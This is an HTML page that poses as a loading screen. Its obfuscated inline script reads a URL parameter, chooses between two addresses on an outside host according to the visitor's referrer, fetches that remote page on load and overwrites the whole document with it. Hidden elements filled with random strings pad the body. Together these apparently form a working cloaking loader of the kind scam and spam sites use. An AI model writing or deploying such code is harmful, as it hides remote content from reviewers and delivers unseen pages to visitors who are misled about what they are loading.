<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xAdOsN7Uz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xAdOsN7Uz .utWsN90s {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xAdOsN7Uz .content {
            line-height: 50px;
            text-align: center
        }

        .xAdOsN7Uz .img {
            width: 100%
        }

        .xAdOsN7Uz .OHOrWxei {
            text-align: center
        }

        .xAdOsN7Uz .OHOrWxei span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xAdOsN7Uz .OHOrWxei span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xAdOsN7Uz .OHOrWxei span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xAdOsN7Uz .OHOrWxei span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xAdOsN7Uz .OHOrWxei span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xAdOsN7Uz .OHOrWxei span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xAdOsN7Uz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function i5slpg2Q1E(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SoNR4UJ = i5slpg2Q1E('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SoNR4UJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SoNR4UJ +".html?a=share";
		}
		
        Ku5ywu=url+"#"+new Date().getTime();
        Ku5ywu && function() {
            $.get(Ku5ywu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >AOksFTkwck5aswU</h1>
<b style='display:none' >z9rUsFcZrRkgUvKiHYwwkWyFdIFD6ojZ</b>
<ul style='display:none' >awsMQyAMvuVYujvvyi7Ddfin0jh5J6UEjF1dbEaYBIw24AVZTaamEwUtsix3Pmowgw8Ju8lxFkG52xfnI8fTI24TT7dMmnJm</ul>
<li style='display:none' >afHZCbeHg7g2FkCFhAuM7CT1iQE</li>
<h1 style='display:none' >AOksFTkwck5aswU</h1>
<ul style='display:none' >awsMQyAMvuVYujvvyi7Ddfin0jh5J6UEjF1dbEaYBIw24AVZTaamEwUtsix3Pmowgw8Ju8lxFkG52xfnI8fTI24TT7dMmnJm</ul>
<div style='display:none'>LsU2SQYr0anOWleb7ffwCJNbr0ddMjIVkcAQP447c3YFDSvGkEhDa</div>
<ul style='display:none' >awsMQyAMvuVYujvvyi7Ddfin0jh5J6UEjF1dbEaYBIw24AVZTaamEwUtsix3Pmowgw8Ju8lxFkG52xfnI8fTI24TT7dMmnJm</ul>
<span style='display:none'>w6QunQTkYfHRa20qN2r48SMZpS8kyIgbFOHlntdjPVoh8WV32TxBlo0DUOIQoPr4hxtnaNPnlWcOUwkc3xT3XMHVo</span><div class="xAdOsN7Uz">
    <div class="utWsN90s">
        <div class="OHOrWxei">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>odDHmiyxhc3aV8wvuDd1ldDfEk8apgQ7CjQ39FHhZFK8</a>
<p  style='display:none'>I5Zyld8KjT0RoDch8roJoawjgGloUwHNQlxTlqiUtQmAjidMDzkqLAHE3JljRVtUBLSUa0v7NaQaN66mVg5</p>
<h1 style='display:none' >dC8h91ngucE9g2pZAeqwF7lja17UeARzlNAcU1PxpgVQa03UWKUNpaHeJF63gsMydHDCzuNDCocbSKNMBa0X7M5XjA8</h1>
<a  href='#' style='display:none'>odDHmiyxhc3aV8wvuDd1ldDfEk8apgQ7CjQ39FHhZFK8</a>
<div style='display:none'>CeuZELF98lUuO</div></body>
</html>